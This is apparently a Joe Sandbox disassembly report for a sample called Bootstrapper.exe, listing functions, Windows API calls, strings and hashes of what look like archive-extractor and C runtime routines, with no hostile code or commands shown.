Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 288d582c9e4a31451faf2ded77004d2e83c50d1dbb5e7ca72f06f3437339ca97
Instruction ID: e625ea2bd7124cad1756ae2dc4b6bf70865b3200da03b1de70349dbf389f0eff
Opcode Fuzzy Hash: 288d582c9e4a31451faf2ded77004d2e83c50d1dbb5e7ca72f06f3437339ca97
Instruction Fuzzy Hash: 8FF03C31A0421CBFCB159BA5EC0DBAEBFB5EB44715F0180A9F805B2260DB759E44CAA0

Function 00E0F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00E1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
Part of subcall function 00E1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E0F2E4
GetProcAddress.KERNEL32(00E481C8,CryptUnprotectMemory), ref: 00E0F2F4

Strings

CryptProtectMemory, xrefs: 00E0F2DE
CryptUnprotectMemory, xrefs: 00E0F2EA
Crypt32.dll, xrefs: 00E0F2CE

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: e3db9b6119b0eeb642ba5b3e191076da74f5e1f323a96bd9a3f6b62759bc327b
Instruction ID: 6d8d20dedbfe1e4f066da477577be421b38fbdc906e8da6606301083a00e90be
Opcode Fuzzy Hash: e3db9b6119b0eeb642ba5b3e191076da74f5e1f323a96bd9a3f6b62759bc327b
Instruction Fuzzy Hash: 2BE04670910746AECB309B79994DF42BED56F04714F14A82DE0DAF3AA0DAB9D5C4CB50

Function 00E22BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00E22CA1
___AdjustPointer.LIBCMT ref: 00E22CC4
_abort.LIBCMT ref: 00E22D12
___AdjustPointer.LIBCMT ref: 00E22D60

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 0791122bb837efd1da5198db221746acb3324fc65b5310645cabcc40b65e5efa
Instruction ID: 1ccc4c217c272472457b5ba1164b07ed721ed86385e3500120c37386fba54252
Opcode Fuzzy Hash: 0791122bb837efd1da5198db221746acb3324fc65b5310645cabcc40b65e5efa
Instruction Fuzzy Hash: D451E172600222BFDB298F14F846BAAB7A4FF54314F24552DEE01772A2D771ED80DB90

Function 00E2BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00E2BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2BF5C

Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E2CA2C,00000000,?,00E26CBE,?,00000008,?,00E291E0,?,?,?), ref: 00E28E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E2BF82
_free.LIBCMT ref: 00E2BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E2BFA4

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a450837ffa84b31decd24988e4e6048812ec9721113178e9b98c688146bc967f
Instruction ID: 9538cbda4f816cf5ac23637f7083fb39a5d2d98129fb628dbd3764e7d5f7bd29
Opcode Fuzzy Hash: a450837ffa84b31decd24988e4e6048812ec9721113178e9b98c688146bc967f
Instruction Fuzzy Hash: E8017172706A257F332116777D4DCBB6B6EEEC2BA53151129F904F2141EF608D0195B0

Function 00E29869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00E291AD,00E2B188,?,00E29813,00000001,00000364,?,00E23F73,00000050,?,00E41030,00000200), ref: 00E2986E
_free.LIBCMT ref: 00E298A3
_free.LIBCMT ref: 00E298CA
SetLastError.KERNEL32(00000000,?,00E41030,00000200), ref: 00E298D7
SetLastError.KERNEL32(00000000,?,00E41030,00000200), ref: 00E298E0

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 83c815d0a503b2cc08a871980e44f0afd9feeed17220acda344b4f7e0dd94a21
Instruction ID: e49ffa85e405b5d52973c434bbe5bddba4884a40cac5e159ff9787b413067cd3
Opcode Fuzzy Hash: 83c815d0a503b2cc08a871980e44f0afd9feeed17220acda344b4f7e0dd94a21
Instruction Fuzzy Hash: 960121321407356B821E2335BC89D1A2AAAAFC2374B293039F501B22A3EE308C0A4220

Function 00E10EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00E111CF: ResetEvent.KERNEL32(?), ref: 00E111E1
Part of subcall function 00E111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00E111F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00E10F21
CloseHandle.KERNEL32(?,?), ref: 00E10F3B
DeleteCriticalSection.KERNEL32(?), ref: 00E10F54
CloseHandle.KERNEL32(?), ref: 00E10F60
CloseHandle.KERNEL32(?), ref: 00E10F6C

Part of subcall function 00E10FE4: WaitForSingleObject.KERNEL32(?,000000FF,00E11206,?), ref: 00E10FEA
Part of subcall function 00E10FE4: GetLastError.KERNEL32(?), ref: 00E10FF6

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: ad010673db78b375bd5950d3a4e5f46b0e4e71818d95cf277cd919854d193379
Instruction ID: b127c160c7545fe99bee5587f7a876987c8b41e813808bccf59be91c8d65e1b3
Opcode Fuzzy Hash: ad010673db78b375bd5950d3a4e5f46b0e4e71818d95cf277cd919854d193379
Instruction Fuzzy Hash: 59015275500744EFC7269B65DC89FC6FBE9FB08711F000929F25AA2161CBB57A85CA50

Function 00E2C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E2C817

Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4

_free.LIBCMT ref: 00E2C829
_free.LIBCMT ref: 00E2C83B
_free.LIBCMT ref: 00E2C84D
_free.LIBCMT ref: 00E2C85F

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ed72682eb0c8efdd11b4c07983fe8012124364abb6e66f8ee72d7a19bd50cef0
Instruction ID: 2048265e0d9cbedab32ef23a90a388473bd9003fb12c0262e51d7b1954bec660
Opcode Fuzzy Hash: ed72682eb0c8efdd11b4c07983fe8012124364abb6e66f8ee72d7a19bd50cef0
Instruction Fuzzy Hash: 63F0FF32505224AF9628DB6AF989C1B77EDAB007187747C19F108F76A2CB70FC848A54

Function 00E11FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E11FE5
_wcslen.LIBCMT ref: 00E11FF6
_wcslen.LIBCMT ref: 00E12006
_wcslen.LIBCMT ref: 00E12014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E0B371,?,?,00000000,?,?,?), ref: 00E1202F

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 264cb5afcd96392fdb6429b03c763a2e7e637fce1dc852259bdfbe81f4390e26
Instruction ID: 2be8842d44df7910989d25a023df53781a85ff41c01b7745073aab372747ed01
Opcode Fuzzy Hash: 264cb5afcd96392fdb6429b03c763a2e7e637fce1dc852259bdfbe81f4390e26
Instruction Fuzzy Hash: B8F06232008124BFCF221F61EC09DCE3F26DB44760B159009F6156E062CB72DAA5DA90

Function 00E115FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00E117BC
_swprintf.LIBCMT ref: 00E1186B

Strings

%s: %s, xrefs: 00E117CB
%ls, xrefs: 00E11641, 00E11657

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 4d82f3cd9631d2d59392da8d6a3f20ab6f9db271b9603e51288a6736fe2a6901
Instruction ID: 92d90a951aca3e050b924e6f0b1b931c27df2582e60dc7ed1012ee45d0e2e4fc
Opcode Fuzzy Hash: 4d82f3cd9631d2d59392da8d6a3f20ab6f9db271b9603e51288a6736fe2a6901
Instruction Fuzzy Hash: 77512775288300FAF6251AA08D46FF576A5AB05B04F24E9C7F387744E1C9A3A4D0A71B

Function 00E27F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\Bootstrapper.exe,00000104), ref: 00E27FAE
_free.LIBCMT ref: 00E28079
_free.LIBCMT ref: 00E28083

Strings

C:\Users\user\AppData\Local\Temp\Bootstrapper.exe, xrefs: 00E27FA5, 00E27FAC, 00E27FDB, 00E28013

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
API String ID: 2506810119-3529758229
Opcode ID: ea0f2c1db56c218b57286718a7f7922cf8ad8ad9613294cb885d15afb81015e4
Instruction ID: 59a464658db81ccbb5decd4f48fa7c371af24c2e92c34981214a2fd83e56f10b
Opcode Fuzzy Hash: ea0f2c1db56c218b57286718a7f7922cf8ad8ad9613294cb885d15afb81015e4
Instruction Fuzzy Hash: 9031B171A05228AFEB21DF95F980D9EBBFCEF95350F10506AF904B7211DAB08E48CB51

Function 00E231D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E231FB
_abort.LIBCMT ref: 00E23306

Strings

RCC, xrefs: 00E23215
MOC, xrefs: 00E2320D

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: c85d463cc53c56c4b695865388738ed18f4b8cd8bf721421a94f5065a25200a0
Instruction ID: d3b21f913b9c79d9f7886744d1d2e36e35f027ae0816904f293ffc0bfe13373b
Opcode Fuzzy Hash: c85d463cc53c56c4b695865388738ed18f4b8cd8bf721421a94f5065a25200a0
Instruction Fuzzy Hash: 7E415A72900129EFCF16DFA4ED81AAEBBB5BF48304F149059FA0476261D739AA50DF50

Function 00E07401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E07406

Part of subcall function 00E03BBA: __EH_prolog.LIBCMT ref: 00E03BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00E074CD

Part of subcall function 00E07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E07AAB
Part of subcall function 00E07A9C: GetLastError.KERNEL32 ref: 00E07AF1
Part of subcall function 00E07A9C: CloseHandle.KERNEL32(?), ref: 00E07B00

Strings

SeSecurityPrivilege, xrefs: 00E0744B
SeRestorePrivilege, xrefs: 00E07460

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: e4886182ee11997d45bf6b0308371493acbde298ff070e6a41018c6d1dc9d556
Instruction ID: adf0acc35e07a0ff4591d750791b4fa62b3beb6e49bc7f08cb16a949a2bbe112
Opcode Fuzzy Hash: e4886182ee11997d45bf6b0308371493acbde298ff070e6a41018c6d1dc9d556
Instruction Fuzzy Hash: 05319071E04258AEDF21ABA4DC45BEE7BB9AB45304F046056F885B72C2C7749AC8CB61

Function 00E1AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370

EndDialog.USER32(?,00000001), ref: 00E1AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00E1ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00E1ADC2

Strings

ASKNEXTVOL, xrefs: 00E1AD28

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: edd191d03b3df55b9963fd7c5f09676800b1983578d3c1cd2e93d2e68cdf7e33
Instruction ID: 2c77489db19723ec128b50c4aa07b5f04a123d3a04e89e87d542e445ad6c63b7
Opcode Fuzzy Hash: edd191d03b3df55b9963fd7c5f09676800b1983578d3c1cd2e93d2e68cdf7e33
Instruction Fuzzy Hash: 20110D32241600BFD3128F69FC05FFB7758EB06749F581064F241F74A0C7A299899722

Function 00E1DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,0001045E,00E1B270,?,?), ref: 00E1DE18

Strings

r, xrefs: 00E1DDDC
xz, xrefs: 00E1DE28
GETPASSWORD1, xrefs: 00E1DE0D

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$r$xz
API String ID: 665744214-1165776382
Opcode ID: 2d4259f3776b5c56dfaa3f7bceb3f48de8634e942e7860db23d21f69f1d257cb
Instruction ID: 06ba23fa374becc3ed98f00feb7b8ae51c21d01fa1e7a1d4abbedfdf60597aab
Opcode Fuzzy Hash: 2d4259f3776b5c56dfaa3f7bceb3f48de8634e942e7860db23d21f69f1d257cb
Instruction Fuzzy Hash: C4112B32608244AEDB11DA34BC06BEF3798AB0A355F145465FD49FB1C1C7B4ACC8C760

Function 00E0D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00E0D954
_strncpy.LIBCMT ref: 00E0D99A

Part of subcall function 00E11DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E41030,00000200,00E0D928,00000000,?,00000050,00E41030), ref: 00E11DC4

Strings

$%s, xrefs: 00E0D949
@%s, xrefs: 00E0D93E

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 40732515790a61e01c695a84c705b8748d84cfbb44e2e088163dfdd2d21b321f
Instruction ID: 18edf66ab0085b3448607c160a2e64a50f0febc3d85d4a90ea02d09121081094
Opcode Fuzzy Hash: 40732515790a61e01c695a84c705b8748d84cfbb44e2e088163dfdd2d21b321f
Instruction Fuzzy Hash: F821AF32444348AEDB21EEE8CC05FEE7BE8AF45304F441522F910B61E2E2B2D688CB51

Function 00E10E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00E0AC5A,00000008,?,00000000,?,00E0D22D,?,00000000), ref: 00E10E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00E0AC5A,00000008,?,00000000,?,00E0D22D,?,00000000), ref: 00E10E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00E0AC5A,00000008,?,00000000,?,00E0D22D,?,00000000), ref: 00E10E9F

Strings

Thread pool initialization failed., xrefs: 00E10EB7

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 5d1506dfa5512b0d8a9515fc2513a62ab9183d2c9c39a7be9e37712c93f5741c
Instruction ID: 1ad8a32e3cff658d5f3b23c8b8571e3340c9dd6fa49fd85d84329b6003292f44
Opcode Fuzzy Hash: 5d1506dfa5512b0d8a9515fc2513a62ab9183d2c9c39a7be9e37712c93f5741c
Instruction Fuzzy Hash: B81191B16407089FD7215F779C88AA7FBECEB54744F14582EF1DAD2200D6B159C08B50

Function 00E0124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00E0125D

Strings

(, xrefs: 00E012A3
2, xrefs: 00E01292
A, xrefs: 00E01285

